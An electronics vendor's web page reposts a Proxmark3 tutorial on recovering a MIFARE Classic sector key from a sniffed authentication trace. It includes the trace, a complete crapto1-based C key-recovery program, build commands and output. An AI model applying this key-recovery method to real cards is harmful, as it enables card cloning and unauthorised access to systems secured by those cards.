GeZhi Electronic Co.Ltd.

GeZhi Electronic Co.Ltd.

Products Category
Contact Us

Name: Michael
Tel: +86-13113330725
Fax: +86-13113330725
Mobile: +86-13113330725
E-mail: xfpga@hotmail.com
Add: JinKe industry DaShi PanYu District GuangZhou City China
MSN: xfpga@hotmail.com
Skype: gezhitech007
QQ: 1074079485
MSN: xfpga@hotmail.com SKYPE: gezhitech007 QQ: 1074079485

Getting the sector key of a mifare card

Author : xfpga Date : 2012-12-12 12:28:59

Getting the sector key of a mifare card(from google code of proxmark3)

Snooping on Mifare communications

This is a working example of how the sector keys of mifare cards can be retrieved with a Proxmark3, using the "crapto-1" package found on Google Code.

The trace below is taken from a hi14asnoop session followed by hf 14a list to get the beginning of the authentication & encryption protocol :

 

Commands Comment
+ 561882 : 1 : 26 REQA
+ 64 : 2 : TAG 04 00 Answer reqa
+ 10217 : 2 : 93 20 Select
+ 64 : 5 : TAG 9c 59 9b 32 6c The card’s UID is therefore : 9c 59 9b 32
+ 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30 Select with UID
+ 64 : 3 : TAG 08 b6 dd Tag type (Mifare 1K)
+ 923318 : 4 : 60 00 f5 7b AUTH (block 00)
+ 112 : 4 : TAG 82 a4 16 6c Tag challenge (nt, "Nonce Tag")
+ 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 ! nr XOR ks1 (Nonce Reader, encrypted, 4 bytes), 
ar XOR ks2 (Answer Reader to Nonce Tag, encrypted)
+ 64 : 4 : TAG 5c ! ad f4 39 ! at XOR ks3 (Answer Tag, encrypted)

 

In order to extract the key for sector 0 from the exchange, we need the following elements :

  • Tag UID
  • Tag challenge (nt)
  • Reader challenge, encrypted (nr xor ks1, aka nr)
  • Reader response, encrypted (ar XOR ks2, aka ar)
  • Tag response, encrypted (at XOR ks3, aka at)

In the example above :

  • UID : 0x9c599b32
  • nt : 0x82a4166c
  • nr : 0xa1e458ce
  • ar : 0x6eea41e0
  • at : 0x5cadf439

Those can then be used in the following "crapto1" test program :

// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>

int main (void)
{
 
struct Crypto1State *revstate;
 uint64_t lfsr
;
 
unsigned char* plfsr = (unsigned char*)&lfsr;


 uint32_t uid                
= 0x9c599b32;
 uint32_t tag_challenge      
= 0x82a4166c;
 uint32_t nr_enc            
= 0xa1e458ce;
 uint32_t reader_response    
= 0x6eea41e0;
 uint32_t tag_response      
= 0x5cadf439;

 uint32_t ks2                
= reader_response ^ prng_successor(tag_challenge, 64);
 uint32_t ks3                
= tag_response ^ prng_successor(tag_challenge, 96);

 printf
("nt': %08x\n",prng_successor(tag_challenge, 64));
 printf
("nt'': %08x\n",prng_successor(tag_challenge, 96));

 printf
("ks2: %08x\n",ks2);
 printf
("ks3: %08x\n",ks3);

 revstate
= lfsr_recovery(ks2, ks3);
 lfsr_rollback
(revstate, 0, 0);
 lfsr_rollback
(revstate, 0, 0);
 lfsr_rollback
(revstate, nr_enc, 1);
 lfsr_rollback
(revstate, uid ^ tag_challenge, 0);
 crypto1_get_lfsr
(revstate, &lfsr);
 printf
("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);

 
return 0;
}

Then compiled with :

#gcc -o test2 test2.c crapto1.c crypto1.c

And run like this :

./test2
nt
': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]


you can use the gui soft to do so, it is the same.